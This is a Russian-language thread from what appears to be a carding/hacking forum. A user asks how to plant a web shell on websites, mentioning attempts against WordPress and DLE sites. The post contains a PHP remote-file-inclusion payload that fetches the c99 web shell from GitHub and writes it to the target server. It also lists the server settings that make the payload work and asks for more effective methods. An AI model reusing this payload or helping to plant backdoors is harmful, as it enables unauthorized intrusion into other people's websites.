1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Способ залить Shell ?

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем akva444, 6 сен 2018.

  1. TopicStarter Overlay
    akva444

    akva444

    Регистрация:
    2 сен 2018
    Сообщения:
    2
    Симпатии:
    1
    Всем привет!
    Существует ли реальный способ залить на сайт Shell ?

    Я вот пробовала (на сайтах с WordPrss и DLE) программу DVWA (File Inclusion) типа:

    _ttp://localhost/dvwa/vulnerabilities/fi/?page=Войти или зарегистрироваться, чтобы увидеть ссылку.

    Содержимое файла nemo.txt

    Код:
    $backdoor = file_get_contents("https://raw.githubusercontent.com/BlackArch/webshells/master/php/c99unlimited.php");
    file_put_contents('c99unlimited.php', "$backdoor");
    echo 'done!';
    Но у меня не получилось... не работает.
    Причём на целевом сервере "присутствует": allow_url_fopen = On и allow_url_include = On
    Сам файл c99unlimited.php локально загружается в паку _ttp://localhost/dvwa/vulnerabilities/fi/
    (после указанных выше действий) но на этом всё!
    Удалённого внедрения файла не происходит... или я что-то не так делаю?

    Может кто-нить подскажет, как правильно?
    Или есть более эффективные способы?
     
    Метки:

Поделиться этой страницей

Загрузка...